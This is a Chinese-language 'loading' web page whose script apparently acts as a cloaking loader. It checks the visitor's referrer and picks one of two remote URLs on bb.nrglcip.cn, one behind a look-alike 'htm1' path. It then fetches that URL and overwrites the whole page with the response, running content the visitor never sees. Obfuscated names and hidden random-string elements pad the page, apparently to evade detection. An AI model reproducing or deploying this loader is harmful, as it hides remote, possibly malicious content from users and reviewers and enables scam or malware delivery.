<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .THdNpxzqnAU {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .THdNpxzqnAU .ZcKdGrUFz2P {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .THdNpxzqnAU .content {
            line-height: 50px;
            text-align: center
        }

        .THdNpxzqnAU .img {
            width: 100%
        }

        .THdNpxzqnAU .nA1pMKvRXui {
            text-align: center
        }

        .THdNpxzqnAU .nA1pMKvRXui span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .THdNpxzqnAU .nA1pMKvRXui span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .THdNpxzqnAU .nA1pMKvRXui span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .THdNpxzqnAU .nA1pMKvRXui span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .THdNpxzqnAU .nA1pMKvRXui span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .THdNpxzqnAU .nA1pMKvRXui span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .THdNpxzqnAU .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function CX8n1mTEBbDeh(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var bTvPY = CX8n1mTEBbDeh('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ bTvPY +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ bTvPY +".html?a=share";
		}
		
        i1RSMP9Ra=url+"#"+new Date().getTime();
        i1RSMP9Ra && function() {
            $.get(i1RSMP9Ra, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>zUWt8KJUhQZy6liYEYnJs6IFMs3mCVHihIxlcYXDsd4gqVnHvdmED06MOZ6ChD</a>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<ul style='display:none' >u5hCgNNVbxwLEAW0kgkOd4kvdzfr3p4Ry1P9jMjZYNXfAjT161xV3mppaE42ZMM7E6bfIFe5p6g</ul>
<h1 style='display:none' >OJMZRYPV3ZABqC00zo2eHA4od6hVn843aO6G4MThmQvmwjyrWnClrq2U77sLKB9A</h1>
<ul style='display:none' >u5hCgNNVbxwLEAW0kgkOd4kvdzfr3p4Ry1P9jMjZYNXfAjT161xV3mppaE42ZMM7E6bfIFe5p6g</ul>
<img  src='' style='display:none'>
<ul style='display:none' >u5hCgNNVbxwLEAW0kgkOd4kvdzfr3p4Ry1P9jMjZYNXfAjT161xV3mppaE42ZMM7E6bfIFe5p6g</ul>
<ul style='display:none' >u5hCgNNVbxwLEAW0kgkOd4kvdzfr3p4Ry1P9jMjZYNXfAjT161xV3mppaE42ZMM7E6bfIFe5p6g</ul><div class="THdNpxzqnAU">
    <div class="ZcKdGrUFz2P">
        <div class="nA1pMKvRXui">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >nZoAeoxg5KrCwnE1xAVjpPgV9aHyYohNRTW0bkxJRhfTCVAgOBqku2</ul>
<ul style='display:none' >nZoAeoxg5KrCwnE1xAVjpPgV9aHyYohNRTW0bkxJRhfTCVAgOBqku2</ul>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>DZDjlxvfS9CGlxyP33WTGWxJvQq2CMu9aXSRkf2BPZFkFVVaQzEt1mEDKDeD20Tsjh0</a>
<img  src='' style='display:none'>
<b style='display:none' >ShHKwaY27WuYrxi5LOmbGTPSP8zrMcL</b></body>
</html>